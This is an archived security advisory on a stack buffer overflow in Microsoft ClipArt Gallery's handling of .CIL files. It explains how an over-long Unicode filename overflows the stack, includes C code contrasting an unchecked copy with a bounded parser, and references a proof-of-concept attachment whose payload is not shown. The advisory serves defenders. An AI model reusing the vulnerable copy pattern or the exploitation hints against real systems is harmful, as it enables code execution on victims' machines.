COMMAND
ClipArt Gallery
SYSTEMS AFFECTED
- Microsoft Office 2000
- Microsoft Works 2000
- Microsoft PictureIt 2000
- Microsoft HP 2000
- Microsoft Publisher99
- Microsoft PhotoDraw 2000 Version 1
PROBLEM
The following is based on the @Stake Inc. advisory by L0pht Research Labs.
ClipArt Gallery (CAG.EXE) that comes with Microsoft Office 2000
processes ".CIL" files for installation of clipart from the
Internet. The CIL format is not handled properly by CAG.EXE and
one of the internal fields in the file presents a buffer overflow
condition, allowing arbitrary code to be executed by an attacker.
The attacker would place a malicious CIL file on a website, or in
an email, causing the target to import the CIL file. The file is
opened without prompting, because the CIL file type does not
require confirmation to open after download. This issue requires
NO active scripting to exploit, and is NOT regulated by Internet
Explorer 'security zones'.
The ".CIL" file format is a compressed clip-art delivery format
that takes a Windows Metafile (WMF) or other image, stores it
compressed, and packages it with keywords and descriptive
information. Amongst the various fields in the CIL format are a
few Unicode strings, one of which is the filename to which the
clipart is to be decompressed. If the filename specified is
extremely long, a stack overflow occurs after a Unicode to ANSI
conversion, copying the ANSI version of the buffer over the stack
frame.
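The following is an added example, not code from CAG.EXE or from the @Stake advisory, that shows the defect shape described above beside a bounded version of the same step. The record layout (a 2-byte unit count followed by UTF-16LE code units), the 260-byte destination buffer, the byte-narrowing stand-in for Unicode-to-ANSI conversion, and every function name are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the fixed stack buffer that receives the narrowed
   filename; the advisory does not state the real buffer size in CAG.EXE. */
#define DEST_NAME_MAX 260

/* Stand-in for the Unicode-to-ANSI conversion: Latin-1 code units map to
   one byte each, anything else becomes '?'. */
static char narrow_unit(uint16_t u)
{
    return u < 0x100 ? (char)u : '?';
}

/* Vulnerable shape: the loop bound comes from the file and the size of the
   destination is never consulted, so an over-long name runs past the end of
   a fixed buffer. This is the condition the advisory describes; it is shown
   here only to contrast with extract_filename() below. */
static void narrow_unchecked(const uint16_t *src, size_t units, char *dst)
{
    size_t i;
    for (i = 0; i < units; i++)
        dst[i] = narrow_unit(src[i]);
    dst[i] = '\0';
}

/* Hardened shape: parse one filename record (assumed layout: uint16 LE unit
   count, then that many UTF-16LE units) into a caller-sized buffer. Both the
   record length and the output size are validated before any byte is
   written; a name that does not fit is rejected rather than truncated,
   since a silently shortened path would change where the clip is stored. */
static int extract_filename(const unsigned char *rec, size_t rec_len,
                            char *out, size_t out_size)
{
    if (rec_len < 2 || out_size == 0)
        return -1;
    size_t units = (size_t)rec[0] | ((size_t)rec[1] << 8);
    if ((rec_len - 2) / 2 < units)      /* count exceeds bytes present */
        return -1;
    if (units >= out_size) {            /* no room for name + terminator */
        out[0] = '\0';
        return -1;
    }
    for (size_t i = 0; i < units; i++) {
        uint16_t u = (uint16_t)(rec[2 + 2 * i] | (rec[3 + 2 * i] << 8));
        out[i] = narrow_unit(u);
    }
    out[units] = '\0';
    return 0;
}

/* Constructed test input: a record whose name is `units` copies of an
   ASCII character. Returns the record length, or 0 if rec is too small. */
static size_t build_record(unsigned char *rec, size_t rec_size,
                           char fill, size_t units)
{
    if (units > 0xFFFF || rec_size < 2 + units * 2)
        return 0;
    rec[0] = (unsigned char)(units & 0xFF);
    rec[1] = (unsigned char)(units >> 8);
    for (size_t i = 0; i < units; i++) {
        rec[2 + 2 * i] = (unsigned char)fill;
        rec[3 + 2 * i] = 0;
    }
    return 2 + units * 2;
}

int main(void)
{
    unsigned char rec[2 + 2 * 1000];
    char name[DEST_NAME_MAX];
    size_t n;

    n = build_record(rec, sizeof rec, 'A', 12);
    printf("12-unit name: rc=%d name=%s\n",
           extract_filename(rec, n, name, sizeof name), name);

    n = build_record(rec, sizeof rec, 'A', 600);
    printf("600-unit name: rc=%d (rejected before any copy)\n",
           extract_filename(rec, n, name, sizeof name));
    return 0;
}
```

The checked parser accepts at most 259 units into a 260-byte buffer, refuses a 260-unit name outright, and also refuses a record whose unit count claims more bytes than the record contains; the unchecked copy behaves identically on short, well-formed input, which is why the defect only surfaces on a crafted file.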
Unfortunately, the current fix for this issue is really only a
band-aid for the problem that Internet Explorer is used -for
everything- nowadays and that its HTML parser allows random file
formats to be downloaded and parsed without confirmation in a
number of cases. One can expect to see similar issues to this in
the future.
Exploit? This CIL file will create a harmless registry key when
opened. The registry key location is:
HKLM\Software\Microsoft\Windows:dword,SMACK!=0x00000001
This is proof of concept code only, but theoretically could be any
executable code desired. This code works only on Windows 2000,
but shifting around a few offsets yields code that works under
Windows NT 4.0 and Win9X.
---
Content-Type: application/octet-stream; name="nt5.cil"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="nt5.cil"
Content-MD5: uYb0UakIEO8InYACxmx77A==
SOLUTION
Vendor provided fix. Get your patch here:
http://cgl.microsoft.com/clipgallerylive/pss/bufovrun.htm
One may wish to go through all of the file type associations and
turn on the 'Confirm Open After Download' checkbox to ensure that
suspect file types are not automatically executed without user
intervention. To do this in Windows 2000, open up a standard
Explorer window (such as My Computer), and go to the Tools menu
and choose "Folder Options". Under the "File Types" tab, go to
the "CIL" file type and click on it. Now press the "Advanced"
button. You will notice that the checkbox "Confirm Open After
Download" is unchecked. Check it, and then click OK.